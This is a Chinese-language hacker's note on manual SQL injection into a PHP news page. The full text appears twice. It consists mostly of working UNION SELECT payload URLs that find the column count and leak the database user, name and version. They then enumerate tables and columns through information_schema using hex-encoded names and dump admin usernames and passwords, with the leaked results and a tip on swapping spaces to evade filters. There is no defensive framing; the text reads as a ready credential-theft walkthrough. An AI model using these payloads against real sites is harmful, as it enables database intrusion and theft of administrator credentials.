php手工注入笔记

　　一.

　　检测字段长度

　　http://www.myhack58.com/news_show.php?id=-61order by 24 报错 说明字段长度是24

　　查看数据库信息

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,user(),3,4,database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

　　user()----------------osywine@115.160.154.39

　　version()--------5.0.91-log 版本

　　5.0以上的版本都带有一个information_schema的虚拟库里面存放的是所有库的信息.

　　database()-------osywine

　　二.

　　利用虚拟库information_schema 报表

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables+where+table_schema=0x6F737977696E65+limit+1,1

　　0x6F737977696E65 是osywine 16进制 0x6F737977696E6520

　　在添加limit+0,1 limit+1,1 limit+0,1 查询下一个

　　爆出admin这张表

　　三.

　　利用表爆字段

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E

　　爆出id

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+1,1

　　爆出username

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+2,1

　　爆出password

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin

　　直接爆用户密码

　　**********************************************************************************

　　第二种方法(比较方便，速度)

　　一次性报爆表

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_schema=0x6F737977696E65

　　0x6F737977696E65 是16进制的osywine

　　所有的表如下：

　　aboutweb,admin,blog,ggao,liuyan,member,news,news_class,news_class2,photo,photo_class,products,products_class,products_class2,settle_accounts,shoping,youqinglj

　　一次性爆出所有字段

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E

　　0x61646D696E 是admin的16进制

　　所有字段如下;

　　id,username,password

　　接下来就是最后一步。。。用户名和密码直接暴出。。。。

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+username,0x5f,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin

　　注:这里面所有的+号是代替空格的，还可以用/**/来代替,不同情况，不同分析!

　　一.

　　检测字段长度

　　http://www.myhack58.com/news_show.php?id=-61order by 24 报错 说明字段长度是24

　　查看数据库信息

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,user(),3,4,database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

　　user()----------------osywine@115.160.154.39

　　version()--------5.0.91-log 版本

　　5.0以上的版本都带有一个information_schema的虚拟库里面存放的是所有库的信息.

　　database()-------osywine

　　二.

　　利用虚拟库information_schema 报表

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables+where+table_schema=0x6F737977696E65+limit+1,1

　　0x6F737977696E65 是osywine 16进制 0x6F737977696E6520

　　在添加limit+0,1 limit+1,1 limit+0,1 查询下一个

　　爆出admin这张表

　　三.

　　利用表爆字段

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E

　　爆出id

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+1,1

　　爆出username

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+2,1

　　爆出password

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin

　　直接爆用户密码

　　**********************************************************************************

　　第二种方法(比较方便，速度)

　　一次性报爆表

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_schema=0x6F737977696E65

　　0x6F737977696E65 是16进制的osywine

　　所有的表如下：

　　aboutweb,admin,blog,ggao,liuyan,member,news,news_class,news_class2,photo,photo_class,products,products_class,products_class2,settle_accounts,shoping,youqinglj

　　一次性爆出所有字段

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E

　　0x61646D696E 是admin的16进制

　　所有字段如下;

　　id,username,password

　　接下来就是最后一步。。。用户名和密码直接暴出。。。。

　　http://www.myhack58.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+username,0x5f,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin

　　注:这里面所有的+号是代替空格的，还可以用/**/来代替,不同情况，不同分析!